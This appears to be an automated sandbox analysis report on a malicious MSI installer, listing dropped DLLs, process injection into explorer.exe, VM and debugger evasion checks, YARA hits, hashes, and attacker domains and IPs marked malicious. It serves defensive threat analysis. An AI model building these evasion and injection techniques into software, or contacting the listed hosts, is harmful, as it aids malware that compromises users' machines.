Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_00F27274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_00F28424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,	9_2_00F30610

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 1782	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8082	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4116	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 695	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4965	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 870	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9F0E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9EBE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9EEE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9E30.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll	Jump to dropped file

Source: C:\Windows\Installer\MSIA029.tmp	API coverage: 6.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 5.5 %

Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 1782 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -106920000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 8082 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -484920000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8188	Thread sleep count: 4116 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8188	Thread sleep time: -4116000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6584	Thread sleep count: 695 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6584	Thread sleep time: -69500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8188	Thread sleep count: 4965 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8188	Thread sleep time: -4965000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW2
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805248446.0000016AD0D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000009.00000003.2282491721.000000000C3FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000000.1792832688.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000009.00000003.2277712034.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F62DCC mov ecx, dword ptr fs:[00000030h]		4_2_00F62DCC
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F6AD78 mov eax, dword ptr fs:[00000030h]		4_2_00F6AD78

Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00F533A8
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5353F SetUnhandledExceptionFilter,	4_2_00F5353F
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00F52968
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00F56E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000001800402A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018005C2BC

Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00007DF457370100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		6_3_00007DF457370100
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,		6_2_0000000273F41380

Windows Analysis Report das.msi

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
das.msi

Malware Threat Intel
Provided by

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: unknown	Jump to behavior

Source: explorer.exe, 00000009.00000003.3081124828.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000009.00000000.1789616621.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3794284200.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Installer\MSIA029.tmp	Code function: EnumSystemLocalesW,	4_2_00F6E0C6
Source: C:\Windows\Installer\MSIA029.tmp	Code function: EnumSystemLocalesW,	4_2_00F6E1AC
Source: C:\Windows\Installer\MSIA029.tmp	Code function: EnumSystemLocalesW,	4_2_00F67132
Source: C:\Windows\Installer\MSIA029.tmp	Code function: EnumSystemLocalesW,	4_2_00F6E111
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00F6E237
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoEx,	4_2_00F523F8
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoW,	4_2_00F6E48A
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00F6E5B3
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoW,	4_2_00F6E6B9
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetLocaleInfoW,	4_2_00F676AF
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00F6E788
Source: C:\Windows\Installer\MSIA029.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_00F6DE24
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_0000000180053038
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	6_2_0000000180052534
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_0000000180052904
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_00000001800529D4
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	6_2_0000000180048A24
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_0000000180047A78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_0000000180047BBC
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_0000000180047C44
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_0000000180052E38

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: Yara match	File source: 6.2.rundll32.exe.16ad2750000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.16ad2700000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.16ad2750000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR

Source: Yara match	File source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4056, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	isomicrotich.com	European Union	13335	CLOUDFLARENETUS	true
82.115.223.39	greshunka.com	Russian Federation	209821	MIDNET-ASTK-TelecomRU	true
80.78.24.30	tiguanin.com	Cyprus	37560	CYBERDYNELR	true

Name	Malicious	Antivirus Detection	Reputation
https://isomicrotich.com/test/	true		unknown
https://opewolumeras.com/test/	true		unknown

ID:	1525187
Product:	CloudBasic
Start time:	20:43:12
Start date:	03.10.2024
Sample:	das.msi
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3cb6b99b20930ac0dbadc10899dc511e
SHA1:	570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
SHA256:	ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
Filetype:	Windows SDK Setup Transform Script (63028/2) 47.91%